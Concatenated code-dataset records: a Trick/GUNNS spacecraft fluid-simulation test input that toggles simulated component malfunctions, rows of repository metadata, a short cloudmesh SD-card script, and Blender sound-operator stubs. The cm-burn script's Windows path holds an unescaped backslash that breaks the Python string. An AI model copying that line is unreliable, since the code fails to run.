trick.add_read(1.0, """massOverflow.fluid9.hxs13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxs23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid10.pchg02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid10.pchg01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.prv01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.prv02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.ls13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.ls23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12.htch01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12.htch12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12err.htch01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12err.htch12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid13.reg01.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid13.reg02.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid13.rel13.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid13.rel23.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid14.pot01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14.pot02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14.pot13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14.pot23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid15.vlv32.setPosition(1.0)""" )
trick.add_read(1.0, """massOverflow.fluid16.src10.setFlowDemand(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid17.pot20.setSourcePressure(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid17.tank1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O, True, 200.0, 10.0)""" )
trick.add_read(1.0, """massOverflow.fluid18.pot20.setSourcePressure(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid18.bln1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O, True, 200.0, 10.0)""" )
trick.add_read(1.0, """massOverflow.fluid19.srck01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid19.srck13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid19.turb02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid19.turb23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfor01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfor02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfval13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfval23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.jump01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.sock02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.jump13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.sock23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.gfan01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.gfan12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.lcp34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.lcp45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid23.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid23.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.pot30.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.sorb13des.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.sorb23des.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.evap14.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.pot20.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.cond34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.react45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.hreact45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.hreact12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.react12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.met0.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.netInput.met0.mNNominal = 2.0""")
trick.add_read(1.0, """massOverflow.fluid29.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid29.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid29.heat10.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid29.heat21.mMalfBlockageFlag = False""")
trick.add_read(1.0, """massOverflow.fluid30.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid30.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid30.v2met1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid30.netInput.v2met1.mNNominal = 2.0""")
trick.add_read(1.0, """massOverflow.fluid31.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid31.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid31.fire1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gsep13for.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gsep13back.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gpump23for.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gpump23back.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.liqSource.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.gasSource.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid34.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid34.lpump12for.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid34.lpump12back.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13ad.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13des.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13des.mCompounds[0].mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13des.mCompounds[0].mMalfEfficiencyValue = 1.0""" )
trick.add_read(1.0, """massOverflow.fluid36.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.cond34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.cond45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.pchg14.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid37.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid37.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid37.sub14.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.sbound1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.sbound2.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid39.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid39.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid39.reactor.setCurrent(10.0)""" )
trick.add_read(1.0, """massOverflow.fluid40.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid40.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid40.cond56.mMalfBlockageFlag = False""" )
#trick.add_read(0.9, """massOverflow.fluid40.rca12.mDesorbFlag = False """)
trick.add_read(1.0, """massOverflow.fluid40.rca45.mCompounds[0].mAdsorbedMass = 0.02""" )
trick.add_read(1.0, """massOverflow.fluid40.rca45.mCompounds[1].mAdsorbedMass = 0.01""" )
trick.add_read(1.0, """massOverflow.fluid41.src01.setFlowDemand(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid41.src02.setFlowDemand(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid42.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid42.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid42.lsep1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.v4meta1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.v4meta1.mRespiration.mBreathsPerMinute = 12.0""" )
trick.add_read(1.0, """massOverflow.fluid44.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid44.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid44.Dhtc13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid44.Dhtc23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45.pot20.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45over.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45over.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45over.pot20.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid46.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.cond56.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.sorb45de.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.sorb45de.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.sorb45de.mMalfBlockageValue = 0.0""" )
trick.add_read(1.0, """massOverflow.fluid47.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid47.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.cond56.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.hsorb45de.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.hsorb45de.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.hsorb45de.mMalfBlockageValue = 0.0""" )
trick.add_read(1.0, """massOverflow.fluid48.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid48.src01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.src01.mMalfBlockageValue = 0.0""" )
trick.add_read(1.0, """massOverflow.fluid48.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.cond56.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mCompounds[0].mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mCompounds[0].mMalfEfficiencyValue = 1.0""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mMalfBlockageValue = 0.0""" )
#---------------------------------------------
# T+5 events (mid-test changes)
#---------------------------------------------
trick.add_read(5.0, """massOverflow.fluid15.vlv32.setPosition(0.0)""" )
trick.add_read(6.0, """massOverflow.fluid15.vlv24.setPosition(1.0)""" )
#---------------------------------------------
# T+10 events (stop some flows to allow settling before comparison)
#---------------------------------------------
trick.add_read(10.0, """massOverflow.fluid15.vlv24.setPosition(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid16.src10.setFlowDemand(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid17.pot20.setSourcePressure(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid17.tank1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O)""" )
trick.add_read(10.0, """massOverflow.fluid18.pot20.setSourcePressure(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid18.bln1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O)""" )
trick.add_read(10.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(10.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(10.0, """massOverflow.fluid33.liqSource.mMalfBlockageFlag = True""" )
trick.add_read(10.0, """massOverflow.fluid33.gasSource.mMalfBlockageFlag = True""" )
#---------------------------------------------
# Setup Data Logging
#---------------------------------------------
execfile("Log_setup/Log_setup.py")
log_setup(0.1)
#---------------------------------------------
# Call integration tests
#---------------------------------------------
trick_utest.unit_tests.enable()
trick_utest.unit_tests.set_file_name( "RUN_test/results/SIM_mass_overflow_int_test_results.xml" )
execfile("int_tests/SimTestSuite.py")
| 64.620455 | 167 | 0.752154 | 3,586 | 28,433 | 5.866425 | 0.102342 | 0.169321 | 0.146599 | 0.123592 | 0.896753 | 0.872273 | 0.815896 | 0.795741 | 0.771403 | 0.336502 | 0 | 0.084071 | 0.058735 | 28,433 | 439 | 168 | 64.767654 | 0.701977 | 0.063518 | 0 | 0.006154 | 0 | 0.006154 | 0.523564 | 0.457743 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d3bda72ee77dcb56a6d39b8531679a4ae91645c6 | 172 | py | Python | dev-scripts/q.py | cloudmesh-community/cm-burn | 536e2762d3c28ff539161dd3eb10c1cd2dedf9b1 | [
"Apache-2.0"
] | null | null | null | dev-scripts/q.py | cloudmesh-community/cm-burn | 536e2762d3c28ff539161dd3eb10c1cd2dedf9b1 | [
"Apache-2.0"
] | 1 | 2018-11-20T16:17:03.000Z | 2018-11-20T16:17:03.000Z | dev-scripts/q.py | cloudmesh-community/cm-burn | 536e2762d3c28ff539161dd3eb10c1cd2dedf9b1 | [
"Apache-2.0"
] | 3 | 2018-09-18T00:00:02.000Z | 2018-12-05T17:16:30.000Z | from cloudmesh.burn.sdcard import WindowsSDCard
card = WindowsSDCard()
card.fix_path("C:\Users\venkata/.cloudmesh/cmburn/images/2021-03-04-raspios-buster-armhf-lite.img")
| 34.4 | 99 | 0.802326 | 25 | 172 | 5.48 | 0.88 | 0.248175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04908 | 0.052326 | 172 | 4 | 100 | 43 | 0.791411 | 0 | 0 | 0 | 0 | 0.333333 | 0.476744 | 0.476744 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
312ce02cdf09f80628957030d276242f19a0d297 | 12,234 | py | Python | premade_modules/2.80/e5e885d0ecb9430a73e0a904cdb6035a2ef77e98/bpy/ops/sound.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.80/e5e885d0ecb9430a73e0a904cdb6035a2ef77e98/bpy/ops/sound.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.80/e5e885d0ecb9430a73e0a904cdb6035a2ef77e98/bpy/ops/sound.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | def bake_animation():
'''Update the audio animation cache
'''
pass
def mixdown(filepath="",
check_existing=True,
filter_blender=False,
filter_backup=False,
filter_image=False,
filter_movie=False,
filter_python=False,
filter_font=False,
filter_sound=True,
filter_text=False,
filter_btx=False,
filter_collada=False,
filter_alembic=False,
filter_folder=True,
filter_blenlib=False,
filemode=9,
relative_path=True,
display_type='DEFAULT',
sort_method='FILE_SORT_ALPHA',
accuracy=1024,
container='FLAC',
codec='FLAC',
format='S16',
bitrate=192,
split_channels=False):
'''Mix the scene’s audio to a sound file
:param filepath: File Path, Path to file
:type filepath: string, (optional, never None)
:param check_existing: Check Existing, Check and warn on overwriting existing files
:type check_existing: boolean, (optional)
:param filter_blender: Filter .blend files
:type filter_blender: boolean, (optional)
:param filter_backup: Filter .blend files
:type filter_backup: boolean, (optional)
:param filter_image: Filter image files
:type filter_image: boolean, (optional)
:param filter_movie: Filter movie files
:type filter_movie: boolean, (optional)
:param filter_python: Filter python files
:type filter_python: boolean, (optional)
:param filter_font: Filter font files
:type filter_font: boolean, (optional)
:param filter_sound: Filter sound files
:type filter_sound: boolean, (optional)
:param filter_text: Filter text files
:type filter_text: boolean, (optional)
:param filter_btx: Filter btx files
:type filter_btx: boolean, (optional)
:param filter_collada: Filter COLLADA files
:type filter_collada: boolean, (optional)
:param filter_alembic: Filter Alembic files
:type filter_alembic: boolean, (optional)
:param filter_folder: Filter folders
:type filter_folder: boolean, (optional)
:param filter_blenlib: Filter Blender IDs
:type filter_blenlib: boolean, (optional)
:param filemode: File Browser Mode, The setting for the file browser mode to load a .blend file, a library or a special file
:type filemode: int in [1, 9], (optional)
:param relative_path: Relative Path, Select the file relative to the blend file
:type relative_path: boolean, (optional)
:param display_type: Display TypeDEFAULT Default, Automatically determine display type for files.LIST_SHORT Short List, Display files as short list.LIST_LONG Long List, Display files as a detailed list.THUMBNAIL Thumbnails, Display files as thumbnails.
:type display_type: enum in ['DEFAULT', 'LIST_SHORT', 'LIST_LONG', 'THUMBNAIL'], (optional)
:param sort_method: File sorting modeFILE_SORT_ALPHA Sort alphabetically, Sort the file list alphabetically.FILE_SORT_EXTENSION Sort by extension, Sort the file list by extension/type.FILE_SORT_TIME Sort by time, Sort files by modification time.FILE_SORT_SIZE Sort by size, Sort files by size.
:type sort_method: enum in ['FILE_SORT_ALPHA', 'FILE_SORT_EXTENSION', 'FILE_SORT_TIME', 'FILE_SORT_SIZE'], (optional)
:param accuracy: Accuracy, Sample accuracy, important for animation data (the lower the value, the more accurate)
:type accuracy: int in [1, inf], (optional)
:param container: Container, File formatAC3 ac3, Dolby Digital ATRAC 3.FLAC flac, Free Lossless Audio Codec.MATROSKA mkv, Matroska.MP2 mp2, MPEG-1 Audio Layer II.MP3 mp3, MPEG-2 Audio Layer III.OGG ogg, Xiph.Org Ogg Container.WAV wav, Waveform Audio File Format.
:type container: enum in ['AC3', 'FLAC', 'MATROSKA', 'MP2', 'MP3', 'OGG', 'WAV'], (optional)
:param codec: Codec, Audio CodecAAC AAC, Advanced Audio Coding.AC3 AC3, Dolby Digital ATRAC 3.FLAC FLAC, Free Lossless Audio Codec.MP2 MP2, MPEG-1 Audio Layer II.MP3 MP3, MPEG-2 Audio Layer III.PCM PCM, Pulse Code Modulation (RAW).VORBIS Vorbis, Xiph.Org Vorbis Codec.
:type codec: enum in ['AAC', 'AC3', 'FLAC', 'MP2', 'MP3', 'PCM', 'VORBIS'], (optional)
:param format: Format, Sample formatU8 U8, 8 bit unsigned.S16 S16, 16 bit signed.S24 S24, 24 bit signed.S32 S32, 32 bit signed.F32 F32, 32 bit floating point.F64 F64, 64 bit floating point.
:type format: enum in ['U8', 'S16', 'S24', 'S32', 'F32', 'F64'], (optional)
:param bitrate: Bitrate, Bitrate in kbit/s
:type bitrate: int in [32, 512], (optional)
:param split_channels: Split channels, Each channel will be rendered into a mono file
:type split_channels: boolean, (optional)
'''
pass
def open(filepath="",
filter_blender=False,
filter_backup=False,
filter_image=False,
filter_movie=True,
filter_python=False,
filter_font=False,
filter_sound=True,
filter_text=False,
filter_btx=False,
filter_collada=False,
filter_alembic=False,
filter_folder=True,
filter_blenlib=False,
filemode=9,
relative_path=True,
show_multiview=False,
use_multiview=False,
display_type='DEFAULT',
sort_method='FILE_SORT_ALPHA',
cache=False,
mono=False):
'''Load a sound file
:param filepath: File Path, Path to file
:type filepath: string, (optional, never None)
:param filter_blender: Filter .blend files
:type filter_blender: boolean, (optional)
:param filter_backup: Filter .blend files
:type filter_backup: boolean, (optional)
:param filter_image: Filter image files
:type filter_image: boolean, (optional)
:param filter_movie: Filter movie files
:type filter_movie: boolean, (optional)
:param filter_python: Filter python files
:type filter_python: boolean, (optional)
:param filter_font: Filter font files
:type filter_font: boolean, (optional)
:param filter_sound: Filter sound files
:type filter_sound: boolean, (optional)
:param filter_text: Filter text files
:type filter_text: boolean, (optional)
:param filter_btx: Filter btx files
:type filter_btx: boolean, (optional)
:param filter_collada: Filter COLLADA files
:type filter_collada: boolean, (optional)
:param filter_alembic: Filter Alembic files
:type filter_alembic: boolean, (optional)
:param filter_folder: Filter folders
:type filter_folder: boolean, (optional)
:param filter_blenlib: Filter Blender IDs
:type filter_blenlib: boolean, (optional)
:param filemode: File Browser Mode, The setting for the file browser mode to load a .blend file, a library or a special file
:type filemode: int in [1, 9], (optional)
:param relative_path: Relative Path, Select the file relative to the blend file
:type relative_path: boolean, (optional)
:param show_multiview: Enable Multi-View
:type show_multiview: boolean, (optional)
:param use_multiview: Use Multi-View
:type use_multiview: boolean, (optional)
:param display_type: Display TypeDEFAULT Default, Automatically determine display type for files.LIST_SHORT Short List, Display files as short list.LIST_LONG Long List, Display files as a detailed list.THUMBNAIL Thumbnails, Display files as thumbnails.
:type display_type: enum in ['DEFAULT', 'LIST_SHORT', 'LIST_LONG', 'THUMBNAIL'], (optional)
:param sort_method: File sorting modeFILE_SORT_ALPHA Sort alphabetically, Sort the file list alphabetically.FILE_SORT_EXTENSION Sort by extension, Sort the file list by extension/type.FILE_SORT_TIME Sort by time, Sort files by modification time.FILE_SORT_SIZE Sort by size, Sort files by size.
:type sort_method: enum in ['FILE_SORT_ALPHA', 'FILE_SORT_EXTENSION', 'FILE_SORT_TIME', 'FILE_SORT_SIZE'], (optional)
:param cache: Cache, Cache the sound in memory
:type cache: boolean, (optional)
:param mono: Mono, Merge all the sound’s channels into one
:type mono: boolean, (optional)
'''
pass
def open_mono(filepath="",
filter_blender=False,
filter_backup=False,
filter_image=False,
filter_movie=True,
filter_python=False,
filter_font=False,
filter_sound=True,
filter_text=False,
filter_btx=False,
filter_collada=False,
filter_alembic=False,
filter_folder=True,
filter_blenlib=False,
filemode=9,
relative_path=True,
show_multiview=False,
use_multiview=False,
display_type='DEFAULT',
sort_method='FILE_SORT_ALPHA',
cache=False,
mono=True):
'''Load a sound file as mono
:param filepath: File Path, Path to file
:type filepath: string, (optional, never None)
:param filter_blender: Filter .blend files
:type filter_blender: boolean, (optional)
:param filter_backup: Filter .blend files
:type filter_backup: boolean, (optional)
:param filter_image: Filter image files
:type filter_image: boolean, (optional)
:param filter_movie: Filter movie files
:type filter_movie: boolean, (optional)
:param filter_python: Filter python files
:type filter_python: boolean, (optional)
:param filter_font: Filter font files
:type filter_font: boolean, (optional)
:param filter_sound: Filter sound files
:type filter_sound: boolean, (optional)
:param filter_text: Filter text files
:type filter_text: boolean, (optional)
:param filter_btx: Filter btx files
:type filter_btx: boolean, (optional)
:param filter_collada: Filter COLLADA files
:type filter_collada: boolean, (optional)
:param filter_alembic: Filter Alembic files
:type filter_alembic: boolean, (optional)
:param filter_folder: Filter folders
:type filter_folder: boolean, (optional)
:param filter_blenlib: Filter Blender IDs
:type filter_blenlib: boolean, (optional)
:param filemode: File Browser Mode, The setting for the file browser mode to load a .blend file, a library or a special file
:type filemode: int in [1, 9], (optional)
:param relative_path: Relative Path, Select the file relative to the blend file
:type relative_path: boolean, (optional)
:param show_multiview: Enable Multi-View
:type show_multiview: boolean, (optional)
:param use_multiview: Use Multi-View
:type use_multiview: boolean, (optional)
:param display_type: Display TypeDEFAULT Default, Automatically determine display type for files.LIST_SHORT Short List, Display files as short list.LIST_LONG Long List, Display files as a detailed list.THUMBNAIL Thumbnails, Display files as thumbnails.
:type display_type: enum in ['DEFAULT', 'LIST_SHORT', 'LIST_LONG', 'THUMBNAIL'], (optional)
:param sort_method: File sorting modeFILE_SORT_ALPHA Sort alphabetically, Sort the file list alphabetically.FILE_SORT_EXTENSION Sort by extension, Sort the file list by extension/type.FILE_SORT_TIME Sort by time, Sort files by modification time.FILE_SORT_SIZE Sort by size, Sort files by size.
:type sort_method: enum in ['FILE_SORT_ALPHA', 'FILE_SORT_EXTENSION', 'FILE_SORT_TIME', 'FILE_SORT_SIZE'], (optional)
:param cache: Cache, Cache the sound in memory
:type cache: boolean, (optional)
:param mono: Mono, Mixdown the sound to mono
:type mono: boolean, (optional)
'''
pass
def pack():
'''Pack the sound into the current blend file
'''
pass
def unpack(method='USE_LOCAL', id=""):
'''Unpack the sound to the samples filename
:param method: Method, How to unpack
:type method: enum in ['USE_LOCAL', 'WRITE_LOCAL', 'USE_ORIGINAL', 'WRITE_ORIGINAL'], (optional)
:param id: Sound Name, Sound data-block name to unpack
:type id: string, (optional, never None)
'''
pass
def update_animation_flags():
'''Update animation flags
'''
pass
